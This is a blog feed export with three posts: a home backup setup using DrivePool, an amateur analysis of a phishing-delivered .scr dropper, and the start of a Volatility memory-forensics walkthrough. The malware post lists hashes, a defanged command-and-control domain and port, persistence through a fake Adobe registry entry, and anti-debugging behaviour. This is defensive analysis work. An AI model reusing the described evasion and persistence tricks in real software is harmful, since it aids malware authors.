tag:blogger.com,1999:blog-54980340970700544122024-03-13T04:30:13.766-07:00Micrmsoft blog(not affiliated with Microsoft)The blog of Allison Nixon(@nixonnixoff), Brandon Levene(@SeraphimDomain), Mathew Ferreira, Travis Christainson(@suspiciouslow), and Nicholas Pence. Network, security, and tech related stuff. Not affiliated with Microsoft.Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.comBlogger23125tag:blogger.com,1999:blog-5498034097070054412.post-75548653688850158202018-02-24T12:08:00.003-08:002018-02-24T15:00:40.328-08:00Data backup and simple duplication<span style="color: #999999;"><span style="color: #999999; font-family: "times" , "times new roman" , serif;">Disclaimer: RAID arrays with duplication protect against most drive failures, and can also protect against corruption of data depending on the setup. However, if all your data is physically located in one building, you can still lose everything. If your PSU decides it's tired of life and wants to take your system with you, you'll lose everything. If someone finds a bedbug in a different apartment and decides to burn the whole building to the ground, you'll lose everything. A safe backup of your local data is a remotely controlled and located NAS, or a cloud storage system.</span></span><br />
<span style="color: #999999;"><span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><span style="color: #999999;"><br /></span></span></span></span>
<span style="color: #999999;"><span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><span style="color: #999999;">On the opposite side of the spectrum, you can maximize your backup safety and longevity at the expense of near total inaccessibility. Buy an LTO tape cartridge, marvel at the $14/TB price ratio, then cry when you see that a tape drive will set you back over $3k. Transfer your data and put the cartridges in an airtight stainless steel time capsule. Add some "DO NOT EAT" packets and seal it in a low humidity room. Bury it in the Los Angeles area for optimal storage temperatures. You can return any time within the next two to three decades, retrieve your data, and cry again as you realize your original tape drive has failed and you need a functioning piece of vintage hardware to retrieve your dog pictures and logs of high school IRC/AIM chats.</span></span></span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I've dreamed of having a full-on standalone NAS system for a long time. I wanted a very expandable zRAID setup with tolerance for two drive failures, running on FreeNAS or something comparable. The hardware requirements for FreeNAS seem reasonable at first glance, but after a little digging you will realize that a smoothly-performing system is going to require a LOT of ECC RAM. You'll also need enough SATA ports for all your drives. I recommend an expansion card with internal SAS ports, each of which can support 4 SATA ports via a breakout cable. You'll need an Ethernet controller that can handle the speeds you want. Throw in the case, PSU, CPU, a motherboard that can support all of the above, the drives themselves, and you have a very expensive system. Before buying anything, check the documentation for your NAS software to make sure all components are supported.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I couldn't justify all that to back up my meager 5TB of data, so I spent $30 on a license for Drivepool and $190 on a 6TB drive.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I had two 3TB drives I wanted to duplicate. The goal was protecting against a single drive failure. I assumed I could just turn on duplication and DrivePool would mirror them on the 6TB drive, but that's not how it works. DrivePool used the disks to create a pool as a lettered logical drive. Data has to be copied to the pool before it can be duplicated. I originally decided to partition the 6TB drive into two partitions and create two pools, each containing a 3TB drive and a new 3TB partition. After spending a day or two doing a completely unnecessary full format on these partitions, I realized that the partitions were pointless and it was simpler to leave each drive with a single partition and copy all three to one pool. I made sure duplication was turned off, copied the files to the pool, verified that all the data was on the pool, then deleted the original non-pool data, turned on duplication and let DrivePool do its thing.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Afterward, since all my files were accessible from the new lettered pool drive, I removed the letters of my 3TB drives since I no longer needed to directly access them. It uncluttered my drive list and DrivePool doesn't care if a drive is hidden or not.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">The UI is simple and user-friendly, but I will note the few things that initially confused me. First, DrivePool sorts data into categories that are not self-explanatory at first glance. </span><a href="https://community.covecube.com/index.php?/topic/37-faq-unduplicated-vs-duplicated-vs-other-vs-unusable/&page=0#comment-189" style="font-family: times, "times new roman", serif;" target="_blank">This simple and helpful post</a><span style="font-family: "times" , "times new roman" , serif;"> was the clearest and most useful one I could find.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Helpful tip: When you are copying files, DrivePool will automatically limit the transfer rate to 40-50% of a disk's maximum I/O speed so that the drive will still be usable during the process. If you don't need this usability, there will be a ⏩ symbol to the right of the progress bar at the bottom of the window. Click it to allow DrivePool to remove the limiter and copy the files twice as fast.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Here is what my current pool looks like:</span></span><br />
<span style="color: #999999;"><span style="color: #999999; font-family: "times" , "times new roman" , serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzmgkAUCAKv7u5CPM3PbwREXiQKTeKawFyNhF6GiFSDFxCjD8riNzkYvhzw_SUxAhyphenhyphentARFTLX1TIdErWG_KWTHDUDVD8PllyWEfKyWyQtfEeJjFljN9KU6kBxNH8bYgEclxsJriV_ZGiz/s1600/dpool.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="712" data-original-width="1600" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzmgkAUCAKv7u5CPM3PbwREXiQKTeKawFyNhF6GiFSDFxCjD8riNzkYvhzw_SUxAhyphenhyphentARFTLX1TIdErWG_KWTHDUDVD8PllyWEfKyWyQtfEeJjFljN9KU6kBxNH8bYgEclxsJriV_ZGiz/s400/dpool.png" width="400" /></a><span style="color: #999999; margin-left: 1em; margin-right: 1em;"></span></div>
<div>
<br /></div>
Nick Pencehttp://www.blogger.com/profile/10647971187331096920noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-21306283336381712482013-06-12T09:53:00.001-07:002013-06-12T13:12:41.787-07:00Malware Analysis In Situ<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><i>Preface: I am by no means a "professional" malware analyst, and I'm sure there are easier ways to analyze samples (including just throwing the following sample at a sandbox). This was more of a live-fire exercise.</i><br />
<br />
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><br />
Besides drive-by downloads, typically in the form of Exploit Kits, one of the most common vectors for delivery of malware is email. Last week I received a typical message promising to contain deposit slips in a .rar file. Instead of trashing it or uploading it to a public sandbox, I decided to take a peak into the sample's functionality using a variety of techniques. Some of these have been covered in previous articles (<a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">Malware Analysis 101 Part 1</a>, <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-2.html">Malware Analysis 101 Part 2</a>, <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-3.html">Malware Analysis 101 Part 3</a>) while others will be somewhat more advanced. First we'll start with static analysis in <a href="http://www.dependencywalker.com/">dependencywalker</a> and <a href="https://www.hex-rays.com/products/ida/index.shtml">Ida Free</a>. Then we'll move onto <a href="http://www.ollydbg.de/">OllyDbg</a>. Next up will be behavioral analysis within the analysis VM using <a href="http://www.thebaskins.com/main/component/content/article/15-work/60-noriben-your-personal-portable-malware-sandbox">Brian Baskins</a>' <a href="https://github.com/Rurik/Noriben/blob/master/Noriben.py">Noriben.py</a> (and <a href="http://practicalmalwareanalysis.com/fakenet/">fakenet</a> to emulate a "real" internet connection). Finally, I'll share the final report from malwr.com to see what indicators we may have missed throughout the above process.<br />
<br />
<a name='more'></a><br />
<br />
<u><b>The File</b></u><br />
Originally the sample was attached to an email as a password protected .rar <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO7E-mCabT3EqPKuTm0trR3-5S967-UsrPVz6yPK-S3IkSAkQIsSwz73_AJQGgcfhy2KQfCFtwNX23Hx678WaPOXHuSGGB60I7CFBAMHKKeY7s2toFgyIe9YIh3GYca7HRLIYx20MURbQe/s1600/1MalwarePDFIcon.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO7E-mCabT3EqPKuTm0trR3-5S967-UsrPVz6yPK-S3IkSAkQIsSwz73_AJQGgcfhy2KQfCFtwNX23Hx678WaPOXHuSGGB60I7CFBAMHKKeY7s2toFgyIe9YIh3GYca7HRLIYx20MURbQe/s1600/1MalwarePDFIcon.jpg" /></a></div>
archive (md5: e5176acddc19b5fc7e561c41648f7eb1). The password was included in the body of the spam message. This is a relatively common evasion method used to fool environments that do not reject unapproved, encrypted archives. Inside of the .rar file is an executable file (md5: 93305ed2d617888501c034b1208e97ba) with a file extension ".scr" (Windows Screensaver), and an icon that appears to be a rip off of Adobe's PDF format (in fact, exploring the .rsrc section of the PE shows that the icon is the same). This mismatch is pretty typical but is jarring enough that it should raise the hackles of anyone paying attention.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_JEYiiRpfYmBxBgQXMOfkWmPTstiEIFDaUc-CryNOmJa_xjMlcgirWE7TFWedfFEUAVXCRfWiT3sfjtjlIQHeJ9wJV42UU0IZOP176ZTVD6a7GpoZET_y_wSKqzW_gPR9IoKLRYzqP1_N/s1600/2MalwareHexHeader.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_JEYiiRpfYmBxBgQXMOfkWmPTstiEIFDaUc-CryNOmJa_xjMlcgirWE7TFWedfFEUAVXCRfWiT3sfjtjlIQHeJ9wJV42UU0IZOP176ZTVD6a7GpoZET_y_wSKqzW_gPR9IoKLRYzqP1_N/s320/2MalwareHexHeader.jpg" width="320" /></a></div>
<br />
<br />
<u><b><br />Static Analysis</b></u><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwhb27vku5AV3pQHhl24OWuSIzpVC4BS4Wj5oaZvL_MP9Gym1L9ubhKmzwnxdaOmjUiA-9OTEyCwqY7jz7df8FfhmGOZiKmpRq3Rm8k3CunxCirYDsyL8CnFgtDvzBYu7n3L0_tEpZt8qK/s1600/3MalwareDepWalker.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwhb27vku5AV3pQHhl24OWuSIzpVC4BS4Wj5oaZvL_MP9Gym1L9ubhKmzwnxdaOmjUiA-9OTEyCwqY7jz7df8FfhmGOZiKmpRq3Rm8k3CunxCirYDsyL8CnFgtDvzBYu7n3L0_tEpZt8qK/s320/3MalwareDepWalker.jpg" width="320" /></a>Browsing the imports in Dependency Walker reveals some interesting information. We see some interesting imports from KERNEL32.dll one that shares similarity to <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411%28v=vs.85%29.aspx">CreateMutex</a>; <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682608%28v=vs.85%29.aspx">EnterCritcalSection</a>. From this information we can assume that the sample uses a critical section object for mutual-exclusion synchronization (from MSDN). Additionally we see <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms683156%28v=vs.85%29.aspx">GetCommandLineA</a> indicating that this sample interacts with the command line at some stage. What you can't see in the above image (due to the number of API calls) is the import of <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345%28v=vs.85%29.aspx">IsDebuggerPresent</a>, which may indicate this sample has built in anti-analysis abilities. One additional interesting import is <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa376389%28v=vs.85%29.aspx">CheckTokenMembership</a> (from ADVAPI32.dll), which attempts to enumerate the security information for a logon session. Unfortunately, I don't see any indication of a networking component, so its time to dig deeper.<br />
<br />
<br />
Before moving on lets get a better look at the PE Headers using CFF <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLlrE6HFWpFFzqgTd9fmnGPsi52TMOKEGs0-zyIgGesJSVMgP-zFGULVQkw2WVFF69kXuH-WAKH-XBbEXc9wbt9SDPSa5aT7h4Ci3Bh8JE7SqX2IPetmZxr2xINwIlLo3Qm31gehl4e_k/s1600/4MalwareCFFExplorer.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLlrE6HFWpFFzqgTd9fmnGPsi52TMOKEGs0-zyIgGesJSVMgP-zFGULVQkw2WVFF69kXuH-WAKH-XBbEXc9wbt9SDPSa5aT7h4Ci3Bh8JE7SqX2IPetmZxr2xINwIlLo3Qm31gehl4e_k/s320/4MalwareCFFExplorer.jpg" width="306" /></a></div>
Explorer. Not a ton more information to glean from this view, but it is interesting to note that the sample doesn't appear to be packed (see OEP at 0x0008857). We can confirm that this is a PE32 file (not a .scr), if the tell-tale MZ (see Hex View above) wasn't confirmation enough. CFF also offered some additional insight into the .rsrc section of the file, which included an unknown section "XZZDO" at offset 0x8000058. I'm not sure what this actually is, but as we will see below, the included resources in this section "LLMPWU" and "MAAYVD" are called as parameters by the malware. Additionally in the .rsrc section we see the PDF icons as well as configuration information defining process privileges "asInvoker".<br />
<br />
<u><b>Start Function</b></u><br />
<br />
Let's move on to a brief session of Ida Free 5.0. Checking out the graph view <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWWA9UmOJ8qEyfsejf_23OwwqpLELi7y2WZVhnSCgQtN42NCmpRJTnGhLPyzLrUHRPrwfFY3R68WDoImvu_Pds89LTzfXCSsJso7N9C3P0jI0o_RpkonZLs3Efa7A4WdEtM-rFkJCtfnIo/s1600/5MalwareIdaFree.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWWA9UmOJ8qEyfsejf_23OwwqpLELi7y2WZVhnSCgQtN42NCmpRJTnGhLPyzLrUHRPrwfFY3R68WDoImvu_Pds89LTzfXCSsJso7N9C3P0jI0o_RpkonZLs3Efa7A4WdEtM-rFkJCtfnIo/s320/5MalwareIdaFree.jpg" width="320" /></a></div>
of the start function we can see a call to GetCommandLineA which includes calls to 2 subroutines: one which enumerates environment strings, and the other enumerates the name of the running module. Immediately below that we see a jns operand (jump if not sign) which, if NOT taken would result in the function to the right. This function leads into a number of DecodePointer calls, perhaps as a method of obfuscation. Unfortunately, this doesn't tell me a whole lot, since my experience with disassembly is lacking, at best. I can assume, however, that this is a anti-debugging/analysis technique, and that further static analysis may be fruitless. Continuing to delve deeper into the sample using the handy "Names" window we observe an interesting call to "Sleep" (which takes a hex value as a parameter in milliseconds). We will see during the behavioral analysis why this <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPqfqgNLiDr4ifI4rGpmW5yixcLsWmROUse259rK11NaS_vy7H4Tx3reX7dRSY6DJg7-2LHdBpWD1FWHFcULbWQRoSjM_kWCUCzUXIdW64c7VS106ATTJZ1Y9d2n0yiX3o57PBdgaq6HY/s1600/6MalwareDebuggerTrap.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPqfqgNLiDr4ifI4rGpmW5yixcLsWmROUse259rK11NaS_vy7H4Tx3reX7dRSY6DJg7-2LHdBpWD1FWHFcULbWQRoSjM_kWCUCzUXIdW64c7VS106ATTJZ1Y9d2n0yiX3o57PBdgaq6HY/s320/6MalwareDebuggerTrap.jpg" width="320" /></a></div>
is important. For now, I know I'm in over my head, and I need to see the networking component. Lets see if a debugger will help (hint: It won't).<br />
<br />
Running the sample in OllyDbg results in a crash (remember that jns I pointed out? thats what leads to the "crash"), but check out the value of ECX: "CreateProcessW". Setting a breakpoint at the push -1 following this crash results in an infinite loop. This tells us that this behavior is likely intentional. In fact, looking at ProcMon (which I generally keep running during debugging) I can see that additional process spawned and that this "crash" appears to be a simple <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcLm4zofw4UBHBDam_Vd_J6nJpsXJGNodJNroa7dPRoZUJaDlB3FIEyE_LLK_qz9dWo_2HhaXYC2LYTjqN-kSWd1OY58K7Dr3Mvd4gNy1oJ_5GU_JOFxPijEB0bXgs8DqB5PPx_DNgVPJG/s1600/7MalwareOllyDbg.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcLm4zofw4UBHBDam_Vd_J6nJpsXJGNodJNroa7dPRoZUJaDlB3FIEyE_LLK_qz9dWo_2HhaXYC2LYTjqN-kSWd1OY58K7Dr3Mvd4gNy1oJ_5GU_JOFxPijEB0bXgs8DqB5PPx_DNgVPJG/s320/7MalwareOllyDbg.jpg" width="320" /></a></div>
dropper component which builds a second executable file under C:/Users/Documents and Settings. Lets move on to Behavioral Analysis. Since I suspect the VM is now compromised due to my debugging, I'm going to wipe it before proceeding.<br />
<br />
<u><b>Behavioral Analysis</b></u><br />
<br />
Now that my analysis VM is back in pre-infection condition, lets prepare the environment prior to running the malware. First off is FakeNet and then its time to fire up Noriben.py. Noriben is a script by Brian Baskins that takes advantage of the excellent Procmon and its filtering capabilities in order to produce a csv timeline and .txt report. Lets see what it turns up when this sample is run. Running the script is simple, simply browse to the location and invoke Noriben.py, then execute the sample. FakeNet will capture any packets in a .pcap which we can review later. Since there was an embedded Sleep function (3000ms), I suspect this sample lays dormant for a little while, so I let Noriben run for a few minutes following execution.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl92MzjXWfuiuDCSyFMJwZGufKGcPK8uTxj7MK_vBAeuwQ5ODxlebygTi5ZhXYzj0-QC1MoLWE2LX6cEhacWetw3ydIMsSw62lFrOM9liOu_B6lMZvj95hvAUzxGLjM3ln88UI0nl30bh/s1600/8MalwareNoribenAndFakeNet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl92MzjXWfuiuDCSyFMJwZGufKGcPK8uTxj7MK_vBAeuwQ5ODxlebygTi5ZhXYzj0-QC1MoLWE2LX6cEhacWetw3ydIMsSw62lFrOM9liOu_B6lMZvj95hvAUzxGLjM3ln88UI0nl30bh/s320/8MalwareNoribenAndFakeNet.jpg" width="312" /></a></div>
<br />
After giving the sample ample time to stew, a quick Ctrl-C stops Noriben and converts the ProcMon log into separate .csv and .txt files. Browsing the .txt files shows some interesting results; First we see that this sample dropped an additional version of itself to %AppData% (md5: 93305ed2d617888501c034b1208e97ba). Also, we see iexplore.exe being called as a child process of the sample as well as a call to svchost.exe. There were also several notepad.exe processes spawned as children of the sample's process. Finally, we see a number of registry modifications for "Adobe Reader Speed Launcher" which point to Ad0be.exe (md5: 93305ed2d617888501c034b1208e97ba) which was observed being dropped; that solves the question of persistence. So that takes care of the networking, dropper, and persistence components, what else did we see?<br />
<br />
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>The network traffic section of the Noriben report is quite telling. We see what looks like the result of a local API call beaconing to FakeNet, and then we see the results of the call to iexplore.exe that was generated when the sample was run. Lets get a better look at the .pcap generated by FakeNet.<br />
<br />
Browsing the pcap file there is a DNS query for omcxasm(dot)myftp.org [which was intercepted by FakeNet, w00t]. Since the sample believes it has resolved its' C2 domain (in fact, its being routed to localhost) it begins phoning home over TCP port 1866. Over the course of 5 minutes we see 8 beacons to the C2 domain: the first, second, fourth, sixth, and eigth beacons contain 159 bytes of TCP data which contains: New (Likely a status of the malware), local IP of the host, hostname, logged in user name, Windows version, version of the malware (in this case 1.3), status of the process (perhaps) and some additional encoded data. The third, fifth, and seventh beacons contains 318 bytes of data, which seems to be the same TCP payload observed above repeated twice. We also see a shift in source ports being utilized to generate this traffic; starting with TCP 1472, TCP 1728, TCP 1984, TCP 2240, TCP 2496, TCP 2752, TCP 3008, and finally TCP 3264. The destination port of TCP 1866 stays constant. Pretty interesting behavior!<br />
<br />
<u><b>Malwr Report and Summary</b></u><br />
<br />
Here's the malwr report: <a href="https://malwr.com/analysis/Nzc0M2I0N2UzYWE5NDllYTk2NDY4N2RhOTIzNjFhNjc/">clicky</a><br />
<br />
What did we miss? Besides the mutexes created by the dropped process, and an unusual html file (xxx.html), it looks like static analysis, Noriben.py, and FakeNet did a pretty good job of building a profile of both network and host based indicators!<br />
<br />
Below is a summary [Apologies about the quality] of the process flow using <a href="http://www.cert.at/downloads/software/procdot_en.html">ProcDot</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhotd_a8-FveI-jf1E3ZAPByY0XOdeFL9ufMOICmnrssnM28Q90rIZS6y_MaXgblTwO_nt7qBnUC41WCnvFopXJrdTgRIzmtduv_U7i926Yv4rchFcbYK0eh9dBBbiSjztGuI6ywqpYp4QA/s1600/9MalwareFlow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhotd_a8-FveI-jf1E3ZAPByY0XOdeFL9ufMOICmnrssnM28Q90rIZS6y_MaXgblTwO_nt7qBnUC41WCnvFopXJrdTgRIzmtduv_U7i926Yv4rchFcbYK0eh9dBBbiSjztGuI6ywqpYp4QA/s400/9MalwareFlow.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBqGCW6TJ6hK6aJqjR-CufeVRksU2KCRytIhXO8dluKTlDpGBogA9Pl3RSfHgevzFO4HuCX8Hp2JYK5mPKbqxQ-fOdN1sxWDmqZftCmFgCgdB_b2Rp-pd9u19ddOPNnxWgXj3bSX0_ueG/s1600/9MalwareFlow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-17527821269186595682013-03-15T14:00:00.001-07:002013-03-16T17:36:40.307-07:00Memory Games - Volatility<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I had a brief introduction to memory forensics, or rather I was pushed into exploring the topic after an interesting conversation with Micrmsoft's own Allison Nixon.<br />
<br />
Allison had come across a malware sample that was thwarting VM runtime execution and static code analysis. It was evident after IDA began to loop on a large block of code that this particular sample was packed. This was confirmed with a quick strings search. Besides the Visual Basic ASCII strings, there was no means by which to analyze this sample without patching out the encryption function. Unfortunately, neither of us is at a point where we can handle that just yet so we threw some ideas around. Prior to roping me in, while closely observing the sample (Redacted), she discovered the means by which the VM detection was functioning. After removing the registry entry that was observed (more info to come in a blog from Allison) the sample successfully executed and the VM was infected!<br />
<br />
With the sample active in a controlled environment, I suggested that a memory snapshot of the VM environment could be used to carve a copy of the unencrypted sample for local static analysis. This would allow us to bypass the encryption function of the original sample! The awesome thing about VM environments, and VMware Workstation (<a href="http://www.vmware.com/products/workstation">http://www.vmware.com/products/workstation</a>/) in particular, is the ability to create snapshots which include a ".vmem" file. This file format is very similar to using dd (<a href="http://www.forensicswiki.org/wiki/Tools:Memory_Imaging">http://www.forensicswiki.org/wiki/Tools:Memory_Imaging</a>) to dump RAM from a live system, and thus, the open source Volatility Framework (<a href="https://www.volatilesystems.com/default/volatility">https://www.volatilesystems.com/default/volatility</a>). After creating taking a snapshot of the infected VM to generate the .vmem file I needed, I fired up SIFT (Freely provided by SANS <a href="http://computer-forensics.sans.org/community/downloads">here</a>) to begin my search for the nastiness.<br />
<br />
<a name='more'></a><br />
<br />
After mounting the shared folder with the memory sample as read only and sharing it with the SIFT VM, it was time to confirm the correct profile necessary for analyzing this particular memory sample:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyy2DrF6puC_De7Qq_5kHaJXrFDjiODT44b60eUa7qJN2Yrurwh31r9HESvkQa36lGj8rh5VKn678v2U7OI8hgqhyphenhyphenHcSqMlZqy0davtyhif-vm52gIc8IiXI2XB8aJhmNsmLTpVgG_hsRh/s1600/CaptureItPlus634989559698555912.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyy2DrF6puC_De7Qq_5kHaJXrFDjiODT44b60eUa7qJN2Yrurwh31r9HESvkQa36lGj8rh5VKn678v2U7OI8hgqhyphenhyphenHcSqMlZqy0davtyhif-vm52gIc8IiXI2XB8aJhmNsmLTpVgG_hsRh/s640/CaptureItPlus634989559698555912.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
There's a fair amount of information here, but of primary importance is the "Suggested Profiles" field. This field identifies the appropriate profile to utilize for examining volatile memory samples. In this case, Windows XP SP3 32bit (x86) was utilized as the infected host, and we can see that reflected in the screenshot above. Armed with that information, we can now dive into the memory sample. First up, a listing of processes.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMStDqcBYIGTohtxmCE75bxDlwcrb-GDyC4ZlMWIg3NN7aEwunQfPQ874WHfFulCc1llgK9JEElghPyIBqpmfFopgxP18tT-LhR3R_pyR7LoyawygGISn3vLVaiLJATjUVzzc-RyrXw5w/s1600/CaptureItPlus634989586341149781.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMStDqcBYIGTohtxmCE75bxDlwcrb-GDyC4ZlMWIg3NN7aEwunQfPQ874WHfFulCc1llgK9JEElghPyIBqpmfFopgxP18tT-LhR3R_pyR7LoyawygGISn3vLVaiLJATjUVzzc-RyrXw5w/s640/CaptureItPlus634989586341149781.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I have opted to use the psscan plugin to enumerate processes by using pool tag scanning. According to MSDN: "The pool tag is a mechanism for identifying the driver or other part of the kernel allocated to a particular portion of memory (<a href="http://technet.microsoft.com/en-us/library/cc958284.aspx">Source</a>)." Processes that have been terminated or hidden can be identified by using this method. This particular sample doesn't appear to hide itself very well, as we see that the second listed process (PID 3884) looks a bit unusual (name redacted). Of additional concern is PID 3896 which was identified as suspicious while the infection process was observed. From here on out, our primary concern will be the investigation of PID 3884, as it appears to be the same executable that we were unable to perform static analysis upon.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
